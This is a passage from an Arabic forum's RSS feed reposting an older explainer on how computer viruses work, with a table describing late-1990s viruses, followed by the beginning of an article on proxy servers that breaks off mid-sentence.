تظهر أنواع جديدة من الفيروسات إلى حيز الوجود بشكل دائم، مع استمرار لعبة القط والفأر بين مطوري الفيروسات ومنتجي برامج مكافحتها. وأغلب الظن أن الفيروسات ظهرت لتبقى، إلى ما شاء الله.


بعض الفيروسات الشائعة 

اسم الفيروس نوعه مجالات التلويث مواصفاته 
Aol4free.com حصان طروادة لا شيء! فهو يحذف الملفات من القرص الصلب، لكنه لا ينتقل إلى تطبيقات أخرى يستخدم تعليمة Deltree (من دوس) عند تنشيطه، لحذف الملفات من القرص الصلب، وهو مختلف عن فيروس Aol4free السابق له 
Form مقيم، قطاع الإقلاع قطاع الإقلاع على الأقراص المرنة قديم نسبياً لكنه شائع، يصدر صوت نقرات عند الضغط على لوحة المفاتيح 
Hare مقيم، متغير الشكل، متعدد الأجزاء ملفات COM و EXE، وقطاع الإقلاع الرئيسي، وقطاع الإقلاع على الأقراص المرنة ينشط في الثاني والعشرين من أغسطس وسبتمبر، ويحاول مسح سواقات A: و B: و C: 
Java.App Strange Brew ملوث ملفات، مباشر العمل ملفات فئات جافا أول فيروس يصيب بريمجات جافا، ويمكنه الانتشار عبر نظم تشغيل مختلفة، لكن لا تعرف له أضرار 
Microsoft.Excel.Spellcheck ماكرو جداول إكسل الممتدة يشكل الملف Spellck.xla في مجلد إقلاع إكسل، وهو غير مؤذ، لكنه يعرض رسائل يحذر فيها من فيروسات الماكرو 
Monica (Hanko.4167) ملوث ملفات، متسلل، مقيم ملفات COM و EXE يوقف عمل الكمبيوتر في الساعة السابعة وسبع دقائق، في اليوم السابع من شهر يوليو، أي 7/7-7:07، ويظهر كلمة Monica 
W95.CIH ملوث ملفات، مقيم ملفات EXE لويندوز95 ينشط في السادس والعشرين من كل شهر، ويحاول الكتابة فوق ذاكرة فلاش بيوس، وتخريب بيانات القرص الصلب 
W95.Marburg ملوث ملفات، مباشر العمل ملفات التطبيقات لنظم ويندوز95/98/إن.تي ينشط بعد ثلاثة أشهر من أول إصابة به، فعند تشغيل تطبيق ملوث، يغطي الشاشة بأيقونة الخطأ في ويندوز، ويحذف برامج مكافحة الفيروسات 
W97/X97M Shiver ماكرو وثائق (ملفات بيانات) وورد97 وإكسل97 أول فيروس من نوع الماكرو يصيب ملفات وورد وإكسل معاً، ويمنع تحميل الوثائق الملوثة 
Win32/Semisoft ملوث ملفات، مقيم ملفات EXE لنظم ويندوز يرسل معلومات من عدة ملفات على القرص الصلب، إلى عناوين IP محددة، عبر إنترنت 
WM.PolyPoster ماكرو وثائق وورد يرسل رسالة إلى مجموعات نقاش محددة، بواسطة برنامج Free Agent، ويضع وثيقة وورد الراهنة كملف مرفق بالرسالة 
XM.Compat ماكرو، متغير الشكل جداول إكسل الممتدة ينشط بعد تاريخ 31 أغسطس 1998 عند إغلاق جدول ملوث، فيختار مجموعة عشوائية من الخلايا العددية، ويغير قيمها بنسبة 5 بالمائة.]]></description>
			<content:encoded><![CDATA[<div>كيف تعمل الفيروسات<br />
<br />
الكاتب: غير معروف<br />
<br />
 <br />
الخطوة الأولى في مكافحة فيروسات الكمبيوتر، هي فهم أنواعها وآليات عملها<br />
<br />
تتضمن معظم الكمبيوترات الشخصية المباعة حديثاً برامج لمكافحة الفيروسات، وهذه الحقيقة، أكثر من أي شيء آخر، تدلنا على مدى انتشار الفيروسات، ومدى قبول صناعة الكمبيوتر بها، كقدر لا مفر منه! لقد أصبحت الفيروسات أمراً واقعاً في عالم الكمبيوتر اليوم.<br />
<br />
يوجد حالياً الآلاف من فيروسات الكمبيوتر، ويمكن تصنيفها إلى عدة فئات، لكنها جميعاً، على العموم، تخضع لتعريف مشترك بسيط: الفيروس هو برنامج كمبيوتر مصمم عمداً ليقترن ببرنامج آخر، بحيث يعمل الفيروس عندما يعمل ذلك البرنامج، ومن ثمَّ يعيد إنتاج نفسه باقترانه ببرامج أخرى. ويقترن الفيروس بالبرنامج الأصلي بإلصاق نفسه به، أو باستبداله أحياناً، وقد يغير الفيروس نفسه عند إعادة الإنتاج، فيظهر كنسخة معدلة عن النسخة التي قبلها، كلما كرر العملية. ويمكن أن تتلوث برامج الماكرو بالفيروس، أو قطاع الإقلاع (boot sector) على القرص، وهو أول برنامج يتم تحميله من قرص يحمل ملفات إقلاع نظام التشغيل.<br />
<br />
لاحظ عبارة &quot;مصمم عمداً&quot; في التعريف، فالفيروسات لا تظهر صدفة، بل يكتبها مبرمجون ذوو مهارات عالية عادة، ثم يجدون طريقة لنشرها في أجهزة المستخدمين الغافلين عنها. وكلما أصبحت برامج مكافحة الفيروسات أقوى، زاد المبرمجون من جهودهم لتطوير فيروسات أذكى، للتحايل عليها. والهدف من تطوير الفيروسات، بالنسبة للكثير من مؤلفيها، ليس أكثر من تحد، والرغبة في إثبات تفوقهم، بينما هو للبعض الآخر التلذذ بإثارة حيرة الآخرين وشكوكهم في الكمبيوتر، أو إزعاجهم، وحتى إيذائهم! وهذا أمر سيئ جداً، إذ يمكنهم أن يجنوا أموالاً طائلة، إذا وجهوا مواهبهم لمساعدة الشركات على حل مشكلة العام 2000، بدلاً من هدرها في أعمال لا طائل منها، مثل تطوير الفيروسات.<br />
<br />
اشتهرت فيروسات الكمبيوتر بقدرتها على الأذى وإحداث الأضرار، لكن في الحقيقة، فإن الكثير منها غير مؤذ. صحيح أن بعضها يحذف الملفات، أو يقوم بأعمال تخريبية أخرى، لكن معظمها يسبب إزعاجاً بسيطاً فقط، وبعضها لا يلحظه المستخدم العادي أبداً. ويكفي أن يتمكن البرنامج من إعادة إنتاج نفسه حتى يعتبر فيروساً، بغض النظر عن الأعمال التي ينفذها.<br />
<br />
لكن، في الحقيقة، حتى الفيروسات غير المؤذية، تسبب بعض الأذى! فهي تستهلك مساحات تخزين على القرص، وجزءاً من ذاكرة الكمبيوتر، وتشغل جزءاً من طاقة المعالج، وبالتالي فهي تؤثر على سرعة وكفاءة الجهاز. أضف إلى ذلك، أن برامج كشف الفيروسات وإزالتها، تستهلك أيضاً موارد الجهاز. ويرى الكثير من المستخدمين، أن برامج مكافحة الفيروسات تبطئ عمل الجهاز بشكل ملحوظ، وهي أكثر تطفلاً عليه من الفيروسات ذاتها! وبعبارة أخرى، تؤثر الفيروسات في عالم الكمبيوتر، حتى إذا لم تكن تفعل شيئاً.<br />
<br />
<br />
الفيروسات وأشباه الفيروسات<br />
<br />
إن الشرح المذكور في الفقرة السابقة عن الفيروس، أكثر تحديداً من الطريقة التي نستخدم فيها كلمة &quot;فيروس&quot; في الواقع. وتوجد أنواع أخرى من البرامج، ينطبق عليها تعريف الفيروس جزئياً. تشترك هذه الأنواع مع الفيروسات في أنها تعمل بدون علم المستخدم، وتقوم بأعمال ضمن الكمبيوتر، مصممة عمداً لتنفيذها. ومن هذه الأنواع: الديدان (worms)، وأحصنة طروادة (Trojan horses)، وبرامج الإنزال (droppers). وتعتبر كل هذه البرامج، بما فيها الفيروسات، جزءاً من فئة أكبر تدعى البرامج الماكرة (malware)، وهي مشتقة من عبارة malicious-logic software.<br />
<br />
والدودة برنامج يعيد إنتاج نفسه، لكنها لا تلوث برامج أخرى. تنسخ الدودة نفسها من وإلى الأقراص المرنة، أو عبر الشبكات، ويعتمد بعضها على الشبكة في إنجاز عملها. تستخدم إحدى أنواع الديدان -وهي الدودة المضيفة (host worm)- الشبكة لنسخ نفسها، فقط، إلى أجهزة الكمبيوتر المتصلة بالشبكة. بينما توزع الدودة الشبكية (network worm) أجزاءها على عدة كمبيوترات، وتعتمد على الشبكة فيما بعد لتشغيل هذه الأجزاء. ويمكن أن تظهر الديدان على كمبيوترات منفصلة، فتنسخ نفسها إلى أماكن متعددة على القرص الصلب.<br />
<br />
وسمي النوع الثاني من البرمجيات الماكرة &quot;حصان طروادة&quot;، نسبة للأسطورة الإغريقية الواردة في ملحمة الأوديسا لهوميروس، حيث ترك الجيش الإغريقي حصاناً خشبياً ضخماً، كهدية لسكان طروادة، وكان يختبئ ضمنه مجموعة من الجنود الأشداء، بعد أن تظاهروا بإنهاء الحصار الطويل، وعندما رحل الجيش وأدخل السكان الحصان إلى داخل أسوار المدينة، خرج الجند منه وانقضوا على الحامية، وسقطت المدينة في أيدي الإغريق. وتعتمد برامج أحصنة طروادة على المبدأ ذاته، فهي تختبئ ضمن برامج يبدو مظهرها بريئاً، وعندما يشغّل المستخدم واحداً من هذه البرامج، ينشط الجزء الماكر ويقوم بعمل معين مصمم له. وتختلف أحصنة طروادة عن الفيروسات العادية، في أنها لا تعيد إنتاج نفسها.<br />
<br />
وصممت برامج الإنزال (droppers) لمراوغة برامج مكافحة الفيروسات، وتعتمد على التشفير غالباً لمنع اكتشافها. ووظيفة هذه البرامج عادة، نقل وتركيب الفيروسات، فهي تنتظر لحظة حدوث أمر معين على الكمبيوتر، لكي تنطلق وتلوثه بالفيروس المحمول في طياتها.<br />
<br />
وينتمي مفهوم قنبلة (bomb) الكمبيوتر إلى هذه الفئة، إذ تبنى القنابل ضمن البرمجيات الماكرة كواسطة لتنشيطها. وتبرمج القنابل لتنشط عند حدوث حدث معين. تنشط بعض القنابل في وقت محدد، اعتماداً على ساعة الكمبيوتر. فيمكن برمجة قنبلة مثلاً، لمسح كافة الملفات ذات الامتداد .DOC من قرصك الصلب، عشية رأس السنة الميلادية، أو لعرض رسالة على الشاشة، في اليوم المصادف لعيد ميلاد شخصية مشهورة. وتعمل بعض القنابل تحت شروط أو أحداث أخرى، فيمكن أن تنتظر القنبلة إلى أن يتم تشغيل برنامج معين، عشرين مرة مثلاً، وعندها تمسح ملفات القوالب (templates) الخاصة بهذا البرنامج. ومن وجهة النظر هذه، تعتبر القنابل مجرد برامج جدولة زمنية ماكرة.<br />
<br />
ويمكننا النظر إلى الفيروسات كحالات خاصة من البرمجيات الماكرة، إذ يمكن للفيروسات الانتشار بواسطة برامج الإنزال (ولا يشترط ذلك)، وهي تستخدم مفهوم برامج الديدان لإعادة إنتاج نفسها. ولا تعتبر الفيروسات مماثلة لأحصنة طروادة من الناحية التقنية، إلا أنها تشابهها في نقطتين: فهي تنفذ أعمالاً لا يريدها المستخدم، وتحول البرنامج الذي تلتصق به إلى حصان طروادة عملياً (تختبئ داخله، وتعمل عندما يعمل البرنامج، وتنفذ أعمالاً غير مرغوبة).<br />
<br />
<br />
كيف يعمل الفيروس؟<br />
<br />
تعمل الفيروسات بطرق مختلفة، وسنعرض فيما يلي للطريقة العامة التي تنتهجها كافة الفيروسات. في البداية يظهر الكمبيوتر على جهازك، ويكون قد دخل إليه مختبئاً في ملف برنامج ملوث (مثل ملفات COM أو EXE أو قطاع الإقلاع). وكانت الفيروسات في الماضي تنتشر بشكل أساسي عن طريق توزيع أقراص مرنة ملوثة. أما اليوم، فمعظمها يأتي مع البرامج المنقولة عبر الشبكات (ومن بينها إنترنت)، كجزء من برنامج تركيب نسخة تجريبية من تطبيق معين، أو ماكرو لأحد التطبيقات الشهيرة، أو كملف مرفق (attachment) برسالة بريد إلكتروني.<br />
<br />
ويجدر التنويه إلى أن رسالة البريد الإلكتروني نفسها لا يمكن أن تكون فيروساً، فالفيروس برنامج، ويجب تشغيله لكي يصبح نشطاً. إذاً الفيروس المرفق برسالة بريد إلكتروني، لا حول له ولا قوة، إلى أن تشغّله. ويتم تشغيل فيروسات المرفقات عادة، بالنقر عليها نقرة مزدوجة بالماوس. ويمكنك حماية جهازك من هذه الفيروسات، بالامتناع عن تشغيل أي ملف مرفق برسالة بريد إلكتروني، إذا كان امتداده COM أو EXE، أو إذا كان أحد ملفات بيانات التطبيقات التي تدعم الماكرو، مثل برامج أوفيس، إلى ما بعد فحصه والتأكد من خلوه من الفيروسات. أما ملفات الرسوميات والصوت، وأنواع ملفات البيانات الأخرى القادمة كمرفقات، فهي آمنة، ولا يمكن للفيروس أن ينشط من خلالها، ولذلك فهو لا يهاجمها.<br />
<br />
إذاً يبدأ الفيروس دورة حياته على الجهاز بشكل مشابه لبرنامج حصان طروادة، فهو يختبئ في ثنايا برنامج أو ملف آخر، وينشط معه. في الملفات التنفيذية الملوثة، يكون الفيروس قد أضاف شيفرته إلى البرنامج الأصلي، وعدل تعليماته بحيث ينتقل التنفيذ إلى شيفرة الفيروس. وعند تشغيل الملف التنفيذي المصاب، يقفز البرنامج عادة إلى تعليمات الفيروس، فينفذها، ثم يعود ثانية لتنفيذ تعليمات البرنامج الأصلي. وعند هذه النقطة يكون الفيروس ناشطاً، وجهازك أصبح ملوثاً.<br />
<br />
وقد ينفذ الفيروس مهمته فور تنشيطه (ويطلق عليه فيروس العمل المباشر direct-action)، أو يقبع منتظراً في الذاكرة، باستخدام وظيفة &quot;الإنهاء والبقاء في الذاكرة&quot; (terminate and stay resident, TSR)، التي تؤمنها نظم التشغيل عادة. وتنتمي غالبية الفيروسات لهذه الفئة، ويطلق عليها الفيروسات &quot;المقيمة&quot;. ونظراً للإمكانيات الكبيرة المتاحة للبرامج المقيمة في الذاكرة، بدءاً من تشغيل التطبيقات والنسخ الاحتياطي للملفات إلى مراقبة ضغطات لوحة المفاتيح ونقرات الماوس (والكثير من الأعمال الأخرى)، فيمكن برمجة الفيروس المقيم، لتنفيذ أي عمل يمكن أن يقوم به نظام التشغيل، تقريباً. يمكن تشغيل الفيروس المقيم كقنبلة، فيبدأ مهمته على جهازك عند حدث معين. ومن الأمور التي تستطيع الفيروسات المقيمة عملها، مسح (scan) قرصك الصلب وأقراص الشبكة بحثاً عن الملفات التنفيذية، ثم نسخ نفسها إلى هذه الملفات وتلويثها.<br />
<br />
<br />
أنواع الفيروسات<br />
<br />
يبحث مطورو الفيروسات، بشكل دائم، عن طرق جديدة لتلويث كمبيوترك، لكن أنواع الفيروسات معدودة عملياً، وتصنف إلى: فيروسات قطاع الإقلاع (boot sector viruses)، وملوثات الملفات (file infectors)، وفيروسات الماكرو (macro viruses). وتوجد أسماء أخرى لهذه الفئات، وبعض الفئات المتفرعة عنها، لكن مفهومها يبقى واحداً.<br />
<br />
تقبع فيروسات قطاع الإقلاع في أماكن معينة على القرص الصلب ضمن جهازك، وهي الأماكن التي يقرأها الكمبيوتر وينفذ التعليمات المخزنة ضمنها، عند الإقلاع. تصيب فيروسات قطاع الإقلاع الحقيقية منطقة قطاع الإقلاع الخاصة بنظام دوس (DOS boot record)، بينما تصيب فيروسات الفئة الفرعية المسماة MBR viruses، قطاع الإقلاع الرئيسي للكمبيوتر (master boot record). يقرأ الكمبيوتر كلا المنطقتين السابقتين من القرص الصلب عند الإقلاع، مما يؤدي إلى تحميل الفيروس في الذاكرة. يمكن للفيروسات أن تصيب قطاع الإقلاع على الأقراص المرنة، لكن الأقراص المرنة النظيفة، والمحمية من الكتابة، تبقى أكثر الطرق أمناً لإقلاع النظام، في حالات الطوارئ. والمشكلة التي يواجهها المستخدم بالطبع، هي كيفية التأكد من نظافة القرص المرن، أي خلوه من الفيروسات، قبل استخدامه في الإقلاع، وهذا ما تحاول أن تفعله برامج مكافحة الفيروسات.<br />
<br />
تلصق ملوثات الملفات (وتدعى أيضاً الفيروسات الطفيلية parasitic viruses) نفسها بالملفات التنفيذية، وهي أكثر أنواع الفيروسات شيوعاً. وعندما يعمل أحد البرامج الملوثة، فإن هذا الفيروس، عادة، ينتظر في الذاكرة إلى أن يشغّل المستخدم برنامجاً آخر، فيسرع عندها إلى تلويثه. وهكذا، يعيد هذا النوع من الفيروس إنتاج نفسه، ببساطة، من خلال استخدام الكمبيوتر بفعالية، أي بتشغيل البرامج! وتوجد أنواع مختلفة من ملوثات الملفات، لكن مبدأ عملها واحد.<br />
<br />
تعتمد فيروسات الماكرو (macro viruses)، وهي من الأنواع الحديثة نسبياً، على حقيقة أن الكثير من التطبيقات تتضمن لغات برمجة مبيتة ضمنها. وقد صممت لغات البرمجة هذه لمساعدة المستخدم على أتمتة العمليات المتكررة التي يجريها ضمن التطبيق، من خلال السماح له بإنشاء برامج صغيرة تدعى برامج الماكرو. تتضمن برامج طاقم أوفيس، مثلاً، لغة برمجة مبيتة، بالإضافة إلى العديد من برامج الماكرو المبيتة أيضاً، والجاهزة للاستخدام المباشر. وفيروس الماكرو ببساطة، هو برنامج ماكرو مصمم للعمل مع تطبيق معين، أو عدة تطبيقات تشترك بلغة برمجة واحدة. أصبحت فيروسات الماكرو شهيرة بفضل الفيروس المصمم لبرنامج مايكروسوفت وورد. فعندما تفتح وثيقة أو قالباً ملوثين، ينشط الفيروس ويؤدي مهمته التخريبية. وقد بُرمِج هذا الفيروس لينسخ نفسه إلى ملفات الوثائق الأخرى، مما يؤدي إلى ازدياد انتشاره مع استمرار استخدام البرنامج.<br />
<br />
ويجمع نوع رابع يدعى الفيروس &quot;متعدد الأجزاء&quot; (multipartite) بين تلويث قطاع الإقلاع مع تلويث الملفات، في وقت واحد.<br />
<br />
ستجد قائمة ضخمة بأسماء الفيروسات، مع شرح تفصيلي عن آثار كل منها، في قسم Virus Encyclopedia من موقع مختبر مكافحة الفيروسات، الخاص بشركة سيمانتك، على العنوان:<br />
<br />
<a href="http://www.symantec.com/avcenter/vinfodb.html" target="_blank">http://www.symantec.com/avcenter/vinfodb.html</a><br />
<br />
<br />
ذكاء الفيروسات في ازدياد<br />
<br />
نجح مبدأ فيروس الماكرو، لأن لغات البرمجة أمنت إمكانية الوصول إلى الذاكرة والأقراص الصلبة. وهذا ما أمنته التقنيات الحديثة أيضاً، بما فيها عناصر تحكم ActiveX، وبريمجات جافا (Java applets). صحيح أن هذه التقنيات صُممت مع ضمان حماية القرص الصلب من برامج الفيروسات (تعد جافا أفضل من ActiveX في هذا المجال)، لكن الحقيقة أن هذه البرامج تستطيع تركيب نفسها على جهازك بمجرد زيارتك لموقع ويب. ومن الواضح أن أجهزتنا ستكون أكثر عرضة لمخاطر الفيروسات والبرمجيات الماكرة الأخرى، مع ازدياد تشبيك الكمبيوترات ببعضها، وبشبكة إنترنت، خصوصاً مع المزايا التي تعدنا بها إنترنت لإجراء ترقية نظم التشغيل عبرها (يؤمن نظاما ويندوز98 وويندوز2000 هذه الإمكانيات).<br />
<br />
إن أقل ما يوصف به مطورو الفيروسات، هو مهارتهم وقدرتهم الفذة على الابتكار، فهم يخرجون إلينا دائماً بطرق جديدة لخداع برامج مكافحة الفيروسات. فمثلاً، تضلل الفيروسات المتسللة (stealth viruses) الجديدة، برامج مكافحة الفيروسات، بإيهامها أن الأمور تسير على ما يرام، ولا يوجد أي مؤشر على وجود فيروس. كيف؟<br />
<br />
يعتمد مبدأ عمل الفيروس المتسلل، على الاحتفاظ بمعلومات عن الملفات التي لوثها، ثم الانتظار في الذاكرة، ومقاطعة عمل برامج مكافحة الفيروسات خلال بحثها عن الملفات المعدلة، وإعطائها المعلومات القديمة التي يحتفظ بها عن هذه الملفات، بدلاً من السماح لها بالحصول على المعلومات الحقيقية من نظام التشغيل!<br />
<br />
أما الفيروسات متغيرة الشكل (polymorphic viruses)، فتعدل نفسها أثناء إعادة الإنتاج، مما يجعل من الصعب على برامج مكافحة الفيروسات التي تبحث عن نماذج معينة من مثل هذا الفيروس، اكتشاف كافة أشكاله الموجودة، وبالتالي تستطيع الفيروسات الناجية، الاستمرار وإعادة إنتاج أشكال جديدة.<br />
<br />
تظهر أنواع جديدة من الفيروسات إلى حيز الوجود بشكل دائم، مع استمرار لعبة القط والفأر بين مطوري الفيروسات ومنتجي برامج مكافحتها. وأغلب الظن أن الفيروسات ظهرت لتبقى، إلى ما شاء الله.<br />
<br />
<br />
بعض الفيروسات الشائعة <br />
<br />
اسم الفيروس نوعه مجالات التلويث مواصفاته <br />
Aol4free.com حصان طروادة لا شيء! فهو يحذف الملفات من القرص الصلب، لكنه لا ينتقل إلى تطبيقات أخرى يستخدم تعليمة Deltree (من دوس) عند تنشيطه، لحذف الملفات من القرص الصلب، وهو مختلف عن فيروس Aol4free السابق له <br />
Form مقيم، قطاع الإقلاع قطاع الإقلاع على الأقراص المرنة قديم نسبياً لكنه شائع، يصدر صوت نقرات عند الضغط على لوحة المفاتيح <br />
Hare مقيم، متغير الشكل، متعدد الأجزاء ملفات COM و EXE، وقطاع الإقلاع الرئيسي، وقطاع الإقلاع على الأقراص المرنة ينشط في الثاني والعشرين من أغسطس وسبتمبر، ويحاول مسح سواقات A: و B: و C: <br />
Java.App Strange Brew ملوث ملفات، مباشر العمل ملفات فئات جافا أول فيروس يصيب بريمجات جافا، ويمكنه الانتشار عبر نظم تشغيل مختلفة، لكن لا تعرف له أضرار <br />
Microsoft.Excel.Spellcheck ماكرو جداول إكسل الممتدة يشكل الملف Spellck.xla في مجلد إقلاع إكسل، وهو غير مؤذ، لكنه يعرض رسائل يحذر فيها من فيروسات الماكرو <br />
Monica (Hanko.4167) ملوث ملفات، متسلل، مقيم ملفات COM و EXE يوقف عمل الكمبيوتر في الساعة السابعة وسبع دقائق، في اليوم السابع من شهر يوليو، أي 7/7-7:07، ويظهر كلمة Monica <br />
W95.CIH ملوث ملفات، مقيم ملفات EXE لويندوز95 ينشط في السادس والعشرين من كل شهر، ويحاول الكتابة فوق ذاكرة فلاش بيوس، وتخريب بيانات القرص الصلب <br />
W95.Marburg ملوث ملفات، مباشر العمل ملفات التطبيقات لنظم ويندوز95/98/إن.تي ينشط بعد ثلاثة أشهر من أول إصابة به، فعند تشغيل تطبيق ملوث، يغطي الشاشة بأيقونة الخطأ في ويندوز، ويحذف برامج مكافحة الفيروسات <br />
W97/X97M Shiver ماكرو وثائق (ملفات بيانات) وورد97 وإكسل97 أول فيروس من نوع الماكرو يصيب ملفات وورد وإكسل معاً، ويمنع تحميل الوثائق الملوثة <br />
Win32/Semisoft ملوث ملفات، مقيم ملفات EXE لنظم ويندوز يرسل معلومات من عدة ملفات على القرص الصلب، إلى عناوين IP محددة، عبر إنترنت <br />
WM.PolyPoster ماكرو وثائق وورد يرسل رسالة إلى مجموعات نقاش محددة، بواسطة برنامج Free Agent، ويضع وثيقة وورد الراهنة كملف مرفق بالرسالة <br />
XM.Compat ماكرو، متغير الشكل جداول إكسل الممتدة ينشط بعد تاريخ 31 أغسطس 1998 عند إغلاق جدول ملوث، فيختار مجموعة عشوائية من الخلايا العددية، ويغير قيمها بنسبة 5 بالمائة.</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ssamad2006</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=29350</guid>
		</item>
		<item>
			<title>كل ماتود معرفته عن البروكسي Proxy</title>
			<link>https://kwety.net/vb/showthread.php?t=29347&amp;goto=newpost</link>
			<pubDate>Sun, 03 Sep 2006 22:31:54 GMT</pubDate>
			<description><![CDATA[كل ماتود معرفته عن البروكسي Proxy

الكاتب: هيثم الشرقاوي

 



السلام عليكم ورحمة الله وبركاته

هذه بعض المعلومات عن مزودات البروكسى ارجو ان تستفيدوا منها

البروكسي

محاسنها ومساؤها

مزوّدات البروكسي مستخدمة عالمياً، وعلى نطاق واسع، لتسريع التعامل مع إنترنت

ولأداء بعض الوظائف الأمنية الهامة. وسنحاول إماطة اللثام عن خفايا مزوّدات

البروكسي من خلال الإجابة على مجموعة من الأسئلة التي تكرر طرحها علينا.

ما هي مزودات البروكسي، وكيف تسرّع التعامل مع إنترنت؟

proxy كلمة إنجليزية، تعني الوكيل.

وتقوم مزوّدات بروكسي بدور الوسيط بين المشتركين لدى إحدى شركات تقديم خدمة

إنترنت، وبين المواقع الموجودة على الشبكة العالمية، أو بدور الوكيل عن هؤلاء

المشتركين في طلب المعلومات من تلك المواقع. ونستطيع أن نتخيل مزوّدات

البروكسي كذاكرات كاش كبيرة الحجم، مهمتها تسريع الحصول على المعلومات من

مواقع ويب، وأداء بعض الوظائف الأخرى المفيدة.

إذا أردت مشاهدة صفحة ويب ، فإن برنامج التصفح لديك، سينشئ اتصالاً بينه وبين

موقعنا، ويطلب قراءة وثيقة HTML وينقلها إلى جهازك. ولنفترض أن شخصاً آخر

أراد زيارة موقعنا أيضاً، في ذات الوقت، أو بعد 10 دقائق مثلاً، فإن العمليات السابقة

ستتكرر مرة أخرى، وهذا ما يؤدي إلى إشغال خطوط المزود الذي تتصل عبره بشبكة

إنترنت لطلب المعلومات ذاتها، في نفس الوقت، أو خلال فترات زمنية متقاربة،

خصوصاً عندما يتعلق الأمر بزيارة مواقع شهيرة، يكثر ارتيادها.

أما إذا جهّزت برنامج التصفح لديك لاستخدام مزوّد بروكسي، فإنه سيتصل بهذا المزوّد

وهو proxy الخاص بمزودك، ويطلب منه إحضار الصفحة المطلوبة. وهنا يبحث

مزوّد البروكسي عن الصفحة المطلوبة، في قاعدة بياناته (أي ذاكرة الكاش)

ليرى إن كان هناك نسخة حديثة منها. إذا وجد البروكسي الصفحة ضمن قاعدة بياناته

فإنه يرسلها إليك مباشرة. أما إن لم تكن موجودة لديه، فإنه سيطلبها من موقع ويب

ويرسلها إليك، ويخزّن نسخة منها في قاعدة بياناته، في الوقت ذاته.

وعندما يطلب مشترك آخر يستخدم البروكسي ذاته، نفس الصفحة فإن البروكسي

سيرسلها إليه من قاعدة بياناته مباشرة، وبسرعة كبيرة، بدون الحاجة لإعادة جلبها من

موقعها الأصلي.

وتأتي السرعة نتيجة لحقيقة أخرى وهي أن البروكسي يستطيع قراءة المعلومات من

مواقع ويب، بسرعة أكبر مما يستطيعه جهازك فيما لو اتصل بذلك الموقع مباشرة.

وقال مدير إحدى شركات تقديم خدمة إنترنت في لبنان: "بيّنت سجلاتنا في الأشهر الستة

الماضية أن 60% من المواقع التي يرتادها المشتركون، يتكرر طلبها وأن مزوّد

البروكسي يمكنه أن يوفر على المشتركين 50% من وقتهم، وسطياً.

وعندما تستخدم البروكسي، تعود الفائدة عليك، وعلى بقية المشتركين أيضاً".

ما هي الوظائف الأخرى للبروكسي؟

طُورت تقنية البروكسي في البداية لاستخدامها كحواجز نارية (firewalls) لإنترنت.

والحاجز الناري عبارة عن نظام أمني يفرض توليد جميع الرزم المرسلة أو الواردة إلى

الشبكة الداخلية لمؤسسة ما، من خلال جهاز وحيد. وإذا أراد المستخدمون جلب وثيقة

ما من شبكة إنترنت، فعليهم أن يطلبوا ذلك من مزوّد البروكسي، الذي يقوم بالمهمة

ويمررها لهم من خلال الحاجز الناري.

واشتهرت مزوّدات البروكسي في الآونة الأخيرة، بسبب إمكانياتها في تسريع الوصول

إلى شبكة إنترنت، وتخفيض استهلاك عرض حزمة الناقل، ولأنها تؤمن تدابير أمنية

جيدة للتحكم بعمليات الاتصال بإنترنت.

فمن السهل، باستخدام مزوّد بروكسي تعريف

الأشخاص المسموح لهم الاتصال بإنترنت، وتحديد الخدمات التي يمكنهم استخدامها

(تصفّح، بريد إلكتروني، جلب ملفات، ...). ويمكن لمدير الشبكة أن يحدد أيام الأسبوع

والساعات المسموحة للاتصال بإنترنت، أو أن يمنع الاتصال ببعض المواقع نهائياً.



كيف يمكن للبروكسي منع الاتصال بالمواقع غير المسموحة؟

عندما يطلب أحد المستخدمين وثيقة ما من البروكسي، ولا يجدها البروكسي قي قاعدة

بياناته، فإنه يبحث أولاً ضمن قائمة أسماء المواقع الممنوعة، ويجلب الوثيقة إذا كان

اسم الموقع المطلوب غير موجود في تلك القائمة، التي يحددها مدير البروكسي.

هل يمكن تخزين أي وثيقة ويب في البروكسي؟

لا، فبعض مواقع ويب ترسل صفحات متغيرة ديناميكياً، بناءً على المعلومات التي قدمها

المستخدم. وهناك معايير متفق عليها (وبعض الاستثناءات منها !)، تستخدمها

المزوّدات لاستثناء بعض الصفحات من عملية التخزين في الكاش، وعندما يطلب أي

شخص هذه الصفحات، فيجب جلبها من موقعها الأصلي في كل مرة.

ما هي مساوئ البروكسي؟

يمكن من خلال البروكسي منع الوصول إلى صفحات معينة.

وبالإضافة إلى هذا، فإن السلبية الرئيسية للبروكسي، هي الحصول على صفحات

قديمة أو ناقصة أحياناً، من قاعدة بياناته. ويمكن الالتفاف على هذه المشكلة بإعادة

تحميل الصفحة (بالنقر على زر Reload في برنامج التصفح)، ولكن هذه الطريقة لا

تنجح دائماً. وتحدث المشكلة عندما ينقطع الاتصال خلال عملية جلب البروكسي لصفحة

ما، أو عندما يلغي المستخدم طلبه ففي هذه الحالة يُخزّن جزء من الصفحة في قاعدة

بيانات البروكسي، ولكن يعتبرها البروكسي كاملة، ويرسلها -على حالها- إلى أي

مستخدم يطلبها.
ويتم تنظيف قاعدة بيانات البروكسي وإعادة تنظيمها يومياً، حيث تُمسح الصفحات التي

يكون الطلب عليها في حده الأدنى، مما قد يعني بقاء بعض الصفحات الناقصة في

الكاش لعدة أيام. وربما لاحظ مستخدموا إنترنت في بعض الدول ظهور الرسالة

transfer interrupted على شاشاتهم، كلما حاولوا زيارة موقع

http://www.microsoft.com/ وهذا مثال عما يحدث عندما يخزن البروكسي

صفحة ناقصة لديه. ولكن، لحسن الحظ، فإن هذه المشكلات مؤقتة، ويتم تطوير حلول لها.

واستخدامات البروكسي متشعبة وواسعة، فمركز أبحاث Lewis التابع لوكالة "ناسا"

مثلاً، وعنوانه http://lerc.nasa.gov/، يستخدم مزوّد بروكسي لحماية شبكة

أجهزته من بريمجات جافا (Java Applets) المخربة، من خلال فلترة الوثائق

المجلوبة من إنترنت، وإزالة وصلات جافا منها، وتمرير بقية الوثيقة إلى الشبكة

الداخلية. وجافا لغة برمجة تستخدم "الكائنات" (OOP)، ومستقلة عن منصة العمل

(العتاد ونظام التشغيل)، طورتها شركة صن. ولا تزال جافا تسير بخطوات سريعة نحو

النضج والاكتمال. وتتضمن بعض صفحات ويب، وصلات إلى بريمجات جافا مثل أي أمر

HTML آخر. وعندما يستلم متصفح يدعم جافا صفحة تتضمن وصلات إلى بريمجات

جافا، فإنه يجلب تلك البريمجات مباشرة من إنترنت، وينفذها على جهازك. وعلى الرغم

